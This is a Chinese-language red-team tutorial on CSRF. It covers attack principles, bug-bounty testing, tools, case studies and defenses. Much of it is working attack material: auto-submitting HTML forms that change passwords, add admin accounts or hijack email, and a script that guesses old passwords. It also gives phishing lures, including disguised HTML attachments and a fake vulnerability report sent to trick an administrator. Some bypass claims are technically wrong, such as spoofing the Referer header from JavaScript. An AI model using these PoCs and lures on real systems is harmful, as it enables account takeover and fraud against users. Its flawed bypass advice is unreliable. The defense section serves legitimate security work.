CSRF 漏洞全解析：从原理到实战

CSRF 漏洞全解析：从原理到红队实战（含 SRC 挖掘与护网利用指南）

免责声明

1. 本文所述所有渗透测试技术、工具、命令及实战案例，仅适用于已获得目标系统 / 网络所有者书面授权的测试场景（如企业内部安全评估、甲方委托的红队测试、个人合法拥有的实验环境）。
2. 任何组织或个人若未取得明确书面授权，擅自将本文内容用于对第三方系统 / 网络的扫描、探测、攻击等行为，均属于非法网络活动，涉嫌违反《中华人民共和国网络安全法》《中华人民共和国刑法》（第 285 条 "非法侵入计算机信息系统罪"、第 286 条 "破坏计算机信息系统罪"）及《网络安全审查办法》等法律法规，作者对此类非法行为不承担任何责任，相关法律后果由行为人自行承担。
3. 本文分享的渗透测试技术，核心目的是帮助读者 "理解攻击原理，进而构建更有效的防御体系"------ 渗透测试的本质是 "以攻促防"，而非 "指导攻击"。
4. 网络安全行业的核心伦理是 "保护而非破坏"：所有测试行为需严格控制在授权范围内，测试结束后需完整恢复目标系统状态（如删除后门、清理日志、还原配置），严禁窃取、篡改、泄露目标系统的敏感数据（如用户信息、商业机密、核心代码），严禁破坏目标系统的正常运行。
5. 网络安全是国家安全的重要组成部分，合法合规是每一位渗透测试工程师的职业底线。
6. 您一旦阅读并使用本文内容，即视为已充分理解并同意本免责声明的全部条款。

作为护网红队，CSRF（跨站请求伪造）漏洞是渗透测试中 "低技术门槛、高实战价值" 的典型漏洞 ------ 它无需窃取用户凭证，仅通过诱导用户点击恶意链接，即可利用用户已认证的身份执行非预期操作（如转账、改密码、添加管理员）。在 SRC 中，CSRF 漏洞因验证简单、危害明确（多为中高危），是快速产出的优质方向；在护网行动中，CSRF 常作为 "突破内网系统、横向移动" 的辅助利器，结合社工手段可实现 "无感知权限提升"。本文将从原理出发，拆解漏洞类型、挖掘方法、核心工具，结合 SRC 与护网实战案例，系统化阐述红队如何高效利用 CSRF 漏洞。

一、CSRF 漏洞核心原理："借权攻击" 的底层逻辑

CSRF 的本质是 "滥用用户已认证的会话凭证"，通过构造恶意请求，让服务器误以为是用户的合法操作。其攻击流程依赖三个核心条件，缺一不可。

1. 攻击三要素（缺一不可）

（1）用户已在目标网站认证

用户必须已登录目标网站（如银行、后台管理系统），且会话凭证（如 Cookie）仍有效（未过期、未注销）。这是 CSRF 的前提 ------ 服务器通过 Cookie 识别用户身份，攻击者无需窃取 Cookie，只需利用浏览器 "自动携带 Cookie" 的特性。

（2）攻击者构造恶意请求

攻击者需精准构造与目标操作完全一致的请求（包括 URL、请求方法、参数、HTTP 头），如 "修改密码" 的请求为：

POST /api/change-password HTTP/1.1
Host: target.com

Cookie: session=abc123...（用户已登录的会话 Cookie）

Content-Type: application/x-www-form-urlencoded
old_pwd=123&new_pwd=hack&confirm_pwd=hack

攻击者构造的恶意请求需与上述完全一致（参数、方法、路径均相同）。

（3）用户在认证状态下访问恶意页面

用户需在登录目标网站后，主动或被动（如点击钓鱼链接、浏览含恶意代码的网页）访问攻击者控制的页面，触发恶意请求。此时浏览器会自动携带目标网站的 Cookie，服务器无法区分请求是用户主动发起还是恶意伪造。

2. 与 XSS 的核心区别

很多人容易混淆 CSRF 与 XSS，两者的核心差异在于 "是否需要用户交互" 和 "攻击目标"：

• XSS：利用目标网站的输入过滤缺陷，注入恶意脚本，直接在目标网站内执行（如窃取 Cookie、劫持会话），无需用户访问其他页面；
• CSRF：不注入脚本，仅构造恶意请求，依赖用户在 "已认证 + 访问恶意页面" 的场景下触发，攻击目标是 "执行操作" 而非 "窃取数据"。

3. 典型攻击流程（以 "修改用户邮箱" 为例）

1. 用户登录目标网站 ：用户Alice登录http://target.com，服务器返回会话 Cookie session=alice123（有效期 2 小时）；

2. 攻击者构造恶意请求：攻击者Bob分析target.com的 "修改邮箱" 功能，发现请求为：

   POST /user/email HTTP/1.1
   Host: target.com
   Cookie: session=alice123
   Content-Type: application/x-www-form-urlencoded
   
   new_email=bob@hack.com&submit=1

   Bob 构造包含该请求的恶意 HTML 页面（http://evil.com/csrf.html）；

3. 诱导用户访问 ：Bob 通过邮件向 Alice 发送 "中奖链接"，Alice 点击后访问http://evil.com/csrf.html；

4. 恶意请求触发 ：csrf.html自动向target.com发送上述 POST 请求，浏览器自动携带session=alice123；

5. 服务器执行操作 ：target.com验证 Cookie 有效，判定为 Alice 的合法操作，将其邮箱改为bob@hack.com，Bob 后续可通过 "忘记密码" 功能接管账号。

二、CSRF 漏洞类型与危害等级：从 GET 到业务逻辑缺陷

CSRF 漏洞的危害取决于 "被伪造的操作权限"------ 修改个人资料可能为中危，添加管理员则为高危。按请求方法和利用难度，可分为以下类型：

1. GET 型 CSRF（最易利用，危害中等）

• 特征：目标操作通过 GET 请求实现，参数直接拼接在 URL 中；
• 利用难度：极低，只需诱导用户点击含恶意参数的 URL 即可；
• 典型场景 ：删除文章（/delete?article_id=123）、点赞（/like?post_id=456）、修改个人签名（/profile?signature=hack）；
• 示例：目标删除操作 URL：http://target.com/delete?user_id=789攻击者构造恶意链接：http://target.com/delete?user_id=789，诱导用户点击后，其账号下的资源被删除。

2. POST 型 CSRF（利用稍复杂，危害较高）

• 特征：目标操作通过 POST 请求实现，参数在请求体中；

• 利用难度：中等，需构造自动提交的表单（用户访问页面后无需点击，JS 自动提交）；

• 典型场景：修改密码、转账、添加用户、修改权限；

• 示例：

  攻击者构造csrf.html，包含自动提交的表单：

  <html>
  <body>
    <form action="http://target.com/api/change-password" method="POST">
      <input type="hidden" name="old_pwd" value="123456"> <!-- 假设用户常用密码 -->
      <input type="hidden" name="new_pwd" value="hack123">
      <input type="hidden" name="confirm_pwd" value="hack123">
    </form>
    <script>document.forms[0].submit();</script> <!-- 自动提交表单 -->
  </body>
  </html>

  用户访问后，表单自动提交，若old_pwd正确（可通过社工或弱密码猜测），密码被改为hack123。

3. 业务逻辑型 CSRF（危害最高，依赖场景）

• 特征：结合业务逻辑缺陷，利用 CSRF 执行高权限操作（如添加管理员、开放端口）；
• 典型场景：管理员后台的 "用户管理" 功能（无 CSRF 防护）、内网系统的 "防火墙配置" 功能；
• 危害：若目标是管理员账号，可直接接管系统，在护网中常作为 "突破核心区" 的关键步骤。

三、SRC 中快速挖掘 CSRF 漏洞：实战流程与验证技巧

SRC 中 CSRF 漏洞的挖掘核心是 "识别高风险操作→验证防护缺失→生成 PoC 证明"，需按以下步骤高效落地：

1. 第一步：筛选高风险操作（优先测试）

CSRF 的危害与 "操作权限" 强相关，需优先测试以下高风险功能（按优先级排序）：

• 账号权限类：修改密码、绑定手机 / 邮箱、修改安全问题、注销账号；
• 资源控制类：添加 / 删除用户（管理员功能）、修改用户权限、创建角色；
• 数据操作类：转账、发起交易、删除重要数据（如订单、日志）；
• 配置修改类：修改系统配置（如开放 API、允许外部访问）、修改防火墙规则。

识别方法：

• 登录目标网站，遍历功能菜单，记录所有 "写操作"（非查询类）的请求（如 POST/PUT/DELETE 方法）；
• 用 Burp Suite 拦截请求，标记包含user_id、password、role、amount等敏感参数的请求。

2. 第二步：验证防护措施是否缺失

CSRF 漏洞的本质是 "服务器未对请求的真实性进行校验"，需检查目标是否缺失以下防护措施：

（1）检查是否存在 CSRF Token

CSRF Token 是服务器生成的随机值，绑定用户会话，每次请求需携带（如表单字段csrf_token或 HTTP 头X-CSRF-Token）。若请求中无 Token，或 Token 固定不变（不随会话 / 请求变化），则可能存在漏洞。

验证方法：

• 拦截两次相同操作的请求（如两次修改密码），对比csrf_token值：
  • 若两次 Token 相同→Token 未动态生成，可能可复用；
  • 若请求中无 Token→直接进入下一步验证。

（2）检查 Referer/Origin 验证是否严格

服务器可能通过Referer（请求来源页面）或Origin（请求来源域名）判断请求合法性。若验证逻辑宽松（如仅检查Referer包含target.com，可通过子域名绕过），则存在漏洞。

验证方法：

• 用 Burp 修改Referer为http://evil.com或http://target.evil.com（子域名伪造），发送请求：
  • 若请求成功执行→Referer 验证失效；
  • 若删除Referer头后请求仍成功→未验证 Referer。

（3）检查 Cookie 的 SameSite 属性

SameSite是 Cookie 的安全属性，用于限制跨站请求携带 Cookie：

• SameSite=Strict：完全禁止跨站请求携带 Cookie（可防御 CSRF）；
• SameSite=Lax：仅允许部分跨站请求（如 GET 方法的顶级导航）携带 Cookie；
• SameSite=None：允许跨站请求携带 Cookie（需配合Secure属性，否则无效）。

验证方法：

• 查看目标网站的会话 Cookie（如session）是否包含SameSite=Strict或SameSite=Lax：
  • 若SameSite未设置或为None（且无Secure）→跨站请求可携带 Cookie，存在 CSRF 风险。

3. 第三步：生成 PoC 并验证漏洞

确认防护措施缺失后，需生成 PoC（Proof of Concept）证明漏洞可利用，SRC 通常接受 "能触发操作的 HTML 页面" 或 "Burp 请求截图"。

（1）GET 型 CSRF PoC 生成

直接构造含恶意参数的 URL，例如：

目标操作：GET /admin/add-user?username=hack&role=admin（管理员添加用户）

PoC 链接：http://target.com/admin/add-user?username=hack&role=admin

验证：用已登录管理员账号的浏览器访问该链接，若成功添加hack管理员，则漏洞存在。

（2）POST 型 CSRF PoC 生成

用 Burp Suite 自动生成 PoC：

1. 拦截目标 POST 请求（如修改密码）；
2. 右键选择 "Engagement tools"→"Generate CSRF PoC"；
3. Burp 自动生成 HTML 表单，勾选 "Auto-submit form"（自动提交）；
4. 将生成的 HTML 保存为csrf.html，用已登录用户的浏览器打开，观察是否执行操作（如密码被修改）。

Burp 生成的 PoC 示例：

<html>
  <!-- CSRF PoC - generated by Burp Suite -->
  <body>
    <form action="http://target.com/api/change-password" method="POST">
      <input type="hidden" name="old_pwd" value="123456" />
      <input type="hidden" name="new_pwd" value="hack123" />
      <input type="hidden" name="confirm_pwd" value="hack123" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

4. SRC 提交技巧

• 明确漏洞场景：标注 "管理员添加用户功能存在 CSRF 漏洞""修改密码功能 CSRF 防护缺失"，避免模糊描述；
• 提供完整 PoC：附上可直接触发的 HTML 代码（或链接），并说明 "使用已登录账号访问该页面即可触发"；
• 证明危害：提供 "执行前状态→触发 PoC→执行后状态" 的对比截图（如添加管理员前后的用户列表）；
• 示例提交模板：
  1. 漏洞标题：【高危】http://target.com/admin/add 存在CSRF漏洞，可伪造管理员添加恶意账号；
  2. 复现步骤：
     *
     1. 登录管理员账号admin，访问http://target.com/admin/add；
     • 1. 拦截添加用户请求，生成 CSRF PoC（见附件csrf.html）；
     • 1. 用管理员浏览器打开csrf.html，自动添加用户hack:hack123（角色为 admin）；
  3. 证明截图：包含 "管理员登录状态""PoC 页面""新用户添加成功的截图"。

四、CSRF 漏洞利用工具链：从 PoC 生成到自动化测试

红队利用 CSRF 漏洞的工具需满足 "快速生成 PoC、模拟真实场景、适配不同请求类型" 的需求，以下是实战高频工具：

1. Burp Suite（核心工具，PoC 生成 + 请求篡改）

• 核心功能：拦截请求、生成 CSRF PoC、修改 Referer/Origin 头验证防护有效性；
• 实战技巧：
  • 生成 PoC 时勾选 "Include auto-submit script"：无需用户点击，页面加载后自动提交表单，提高成功率；
  • 用 "Param Miner" 插件检测 CSRF Token ：自动识别请求中可能的 Token 字段（如csrf、token、nonce），判断是否动态变化；
  • Repeater 模块验证 Referer 绕过 ：修改Referer为http://target.evil.com（子域名）或http://target.com.evil.com（后缀伪造），测试是否通过验证。

2. CSRF Tester（自动化 CSRF 漏洞检测）

• 核心功能：自动爬取网站功能，识别可能存在 CSRF 的请求，生成测试 PoC；
• 使用步骤：
  1. 配置目标 URL 和登录 Cookie（session=abc123）；
  2. 点击 "Start Testing"，工具自动爬取所有表单和请求；
  3. 对识别出的高风险请求（如/admin/add），生成 PoC 并标记风险等级；
  4. 用已登录浏览器访问 PoC，验证是否触发操作。

3. 自定义脚本（适配复杂场景）

对于需要动态参数的场景（如old_pwd需用户真实密码），需编写脚本生成 PoC：

# 生成POST型CSRF PoC（带动态参数猜测）
def generate_csrf_poc(target_url, old_pwd_guesses, new_pwd):
    html = f"""<html>
    <body>
        <form action="{target_url}" method="POST">
            <input type="hidden" name="old_pwd" value="{old_pwd_guesses[0]}" />
            <input type="hidden" name="new_pwd" value="{new_pwd}" />
            <input type="hidden" name="confirm_pwd" value="{new_pwd}" />
        </form>
        <script>
            // 尝试多个旧密码（用户常用密码）
            const guesses = {old_pwd_guesses};
            guesses.forEach(pwd => {{
                const form = document.createElement('form');
                form.action = "{target_url}";
                form.method = "POST";
                form.innerHTML = `<input type="hidden" name="old_pwd" value="${{pwd}}" /><input type="hidden" name="new_pwd" value="{new_pwd}" /><input type="hidden" name="confirm_pwd" value="{new_pwd}" />`;
                document.body.appendChild(form);
                form.submit();
            }});
        </script>
    </body>
    </html>"""
    with open("csrf_poc.html", "w") as f:
        f.write(html)
    print("CSRF PoC生成成功：csrf_poc.html")

# 调用示例（猜测用户常用旧密码）
generate_csrf_poc(
    target_url="http://target.com/api/change-password",
    old_pwd_guesses=["123456", "password", "12345678", "admin123"],
    new_pwd="hack123"
)

五、实战与护网中 CSRF 漏洞的深度利用

CSRF 漏洞的价值不仅在于 "单点操作伪造"，更在于 "结合社工与内网环境，实现链式攻击"。以下结合 SRC 与护网案例，阐述红队进阶利用思路：

1. 案例 1：SRC 中利用 CSRF 篡改管理员邮箱，接管后台

环境背景

• 目标资产：http://test-src.com（某企业 CMS 后台）；
• 高风险操作：管理员后台 "个人设置" 可修改邮箱（POST /admin/email），无 CSRF Token，Referer 验证仅检查包含test-src.com；
• 初始权限：普通用户（无管理员权限，但可注册账号）。

渗透步骤

1. 分析目标请求：

   注册账号后，用 Burp 拦截管理员修改邮箱的请求（通过社工获取管理员操作路径）：

   POST /admin/email HTTP/1.1
   Host: test-src.com
   Cookie: session=admin123  # 管理员会话Cookie
   Referer: http://test-src.com/admin/profile
   Content-Type: application/x-www-form-urlencoded
   
   new_email=attacker@hack.com&submit=1

   发现无csrf_token，Referer 仅验证包含test-src.com。

2. 构造绕过 Referer 的 PoC：

   利用 "子域名伪造" 绕过 Referer 验证，构造csrf.html：

   <html>
   <body>
     <form action="http://test-src.com/admin/email" method="POST">
       <input type="hidden" name="new_email" value="attacker@hack.com" />
       <input type="hidden" name="submit" value="1" />
     </form>
     <script>
       // 修改Referer为http://test-src.com.evil.com（包含test-src.com）
       Object.defineProperty(document, 'referrer', {get: () => 'http://test-src.com.evil.com'});
       document.forms[0].submit();
     </script>
   </body>
   </html>

3. 诱导管理员访问：

   通过 SRC 平台的 "漏洞反馈" 功能（假设允许提交链接），向目标企业发送 "虚假漏洞报告"，附带http://evil.com/csrf.html（伪装成 "漏洞演示链接"）。

4. 验证漏洞与提交：

   管理员点击链接后，邮箱被改为attacker@hack.com，攻击者通过 "忘记密码" 功能重置管理员密码，登录后台截图证明危害，SRC 审核通过后获 12 分（高危漏洞）。

2. 案例 2：护网中利用 CSRF 添加内网管理员，横向渗透

环境背景

• 护网目标：某企业内网（办公区→DMZ→核心区）；
• 突破点：DMZ 区 OA 系统（172.16.1.10）存在 CSRF 漏洞（管理员添加用户功能无防护）；
• 内网拓扑：OA 系统与核心区数据库服务器（10.0.0.5）互联，OA 管理员可访问数据库管理页面。

渗透步骤

1. 收集内网信息：

   通过钓鱼邮件获取员工权限登录 OA 系统，发现 "系统管理→用户管理" 功能的添加用户请求：

   POST /oa/admin/user/add HTTP/1.1
   Host: 172.16.1.10
   Cookie: session=oa_admin123  # OA管理员Cookie
   Content-Type: application/x-www-form-urlencoded
   
   username=hack&password=hack123&role=admin&dept=IT

   无 CSRF Token，Cookie 的SameSite未设置，可跨站携带。

2. 构造内网 CSRF PoC：

   生成自动提交的 HTML（csrf_oa.html），并托管在办公区可控的文件服务器（172.16.1.20，通过弱口令获取权限）：

   <html>
   <body>
     <form action="http://172.16.1.10/oa/admin/user/add" method="POST">
       <input type="hidden" name="username" value="redteam" />
       <input type="hidden" name="password" value="Red2024!@#" />
       <input type="hidden" name="role" value="admin" />
       <input type="hidden" name="dept" value="IT" />
     </form>
     <script>document.forms[0].submit();</script>
   </body>
   </html>

3. 社工诱导管理员访问：

   向 OA 管理员发送 "内部通知" 邮件，内容为 "系统升级通知，请点击链接确认权限：http://172.16.1.20/csrf_oa.html"。

4. 横向渗透核心区：

   • 管理员点击后，OA 系统添加redteam管理员账号；
   • 登录 OA 管理员后台，发现 "数据库连接配置" 功能，利用该功能获取数据库服务器（10.0.0.5）的账号密码（sa:Sql2024!）；
   • 通过远程桌面登录10.0.0.5，获取核心业务数据，完成护网攻击链。

3. 护网中 CSRF 漏洞的核心利用技巧

（1）结合内网钓鱼，提高成功率

• 钓鱼载体：内网邮件（伪造 IT 部门通知）、企业微信 / 钉钉消息（伪装成工作文件）、内网论坛帖子（含恶意链接）；
• 伪装技巧 ：将恶意 HTML 命名为系统升级通知.html、会议纪要.html，降低用户警惕性；
• 示例 ：在护网中，针对财务系统的 CSRF 漏洞，发送 "财务报表模板下载" 邮件，附件为报表模板.html（实为 CSRF PoC），诱导财务人员点击，执行转账操作。

（2）利用 CSRF 实现 "无文件攻击"

• 无需上传恶意文件，仅通过 HTML 表单触发请求，规避内网杀软检测；
• 针对内网系统（无公网访问），将 PoC 托管在已控制的内网设备（如打印机、员工 PC），通过内网 URL（\\172.16.1.20\csrf.html）诱导访问。

（3）结合其他漏洞形成攻击链

• CSRF + XSS：用 XSS 在目标网站内注入 CSRF PoC（无需跳转外部页面），例如：

  目标网站存在 XSS 漏洞，注入脚本：

  // 在目标页面内动态生成CSRF表单并提交
  let form = document.createElement('form');
  form.action = '/admin/add-user';
  form.method = 'POST';
  form.innerHTML = '<input name="username" value="hack" /><input name="role" value="admin" />';
  document.body.appendChild(form);
  form.submit();

  用户访问含 XSS 的页面时，自动触发 CSRF 操作。

• CSRF + 弱密码 ：针对修改密码的 CSRF 漏洞，在 PoC 中枚举常见旧密码（如123456、password），提高密码修改成功率。

六、CSRF 漏洞的防御与红队绕过技巧

1. 蓝队常见防御措施

• 强制使用 CSRF Token ：
  • 服务器为每个会话生成随机 Token，绑定用户会话，每次请求必须携带（如表单字段csrf_token）；
  • Token 需具备随机性（不可预测）、时效性（单次有效或短期有效）、关联性（与用户会话绑定）。
• 严格验证 Referer/Origin ：
  • 验证Referer或Origin是否为可信域名（如target.com），拒绝子域名（sub.target.com）或伪造域名；
  • 示例：Referer必须严格等于https://target.com/admin/profile。
• 设置 Cookie 的 SameSite 属性 ：
  • 配置SameSite=Strict（禁止所有跨站请求携带 Cookie）或SameSite=Lax（仅允许部分安全的跨站请求）；
  • 配合Secure属性（仅 HTTPS 传输）和HttpOnly属性（防止 JS 读取）。
• 要求二次验证 ：
  • 高风险操作（如转账、改密码）需输入验证码、短信验证或密码，即使 CSRF 成功也无法完成操作。

2. 红队绕过技巧

• 绕过 CSRF Token ：
  • 若 Token 与用户会话无关（如固定值123456），直接复用 Token 生成 PoC；
  • 若 Token 可通过其他接口获取（如/api/get-token无需认证），先请求获取 Token，再构造 PoC。
• 绕过 Referer 验证 ：
  • 子域名绕过：若验证Referer包含target.com，用http://target.com.evil.com或http://sub.target.com.evil.com；
  • 空 Referer 绕过：部分浏览器在 "新标签页直接访问" 或 "meta 刷新" 时不发送Referer，若服务器允许空 Referer 则可绕过；
  • JS 伪造 Referer：利用document.referrer的特性，在部分旧浏览器中可修改（如 IE 浏览器）。
• 绕过 SameSite=Lax ：
  • SameSite=Lax允许 "GET 方法的顶级导航" 携带 Cookie，可将 POST 请求转为 GET 请求（若目标支持），或通过a标签跳转触发 GET 型 CSRF。

七、总结

CSRF 漏洞的本质是 "服务器无法区分请求的真实发起者 "，其在红队渗透中的核心价值在于 "低成本借权操作 "------ 无需窃取凭证，仅通过社工诱导即可利用用户身份执行操作。在 SRC 中，挖掘 CSRF 的关键是 "聚焦高风险操作 + 验证防护缺失"；在护网中，需结合内网钓鱼、其他漏洞形成攻击链，实现 "无感知权限提升"。

红队工程师利用 CSRF 漏洞的核心思维是 "场景适配"：

• 针对公网系统，用社会工程学（钓鱼邮件、虚假链接）诱导用户触发；
• 针对内网系统，结合内网资产（如文件服务器、打印机）托管 PoC，利用信任关系提高成功率；
• 始终将 CSRF 作为 "辅助工具"，与 XSS、弱密码等漏洞结合，最大化攻击效果。

重要提示 ：CSRF 漏洞的利用依赖用户交互，需在合法授权下进行，未经授权的恶意诱导属于 "非法攻击"，需承担法律责任。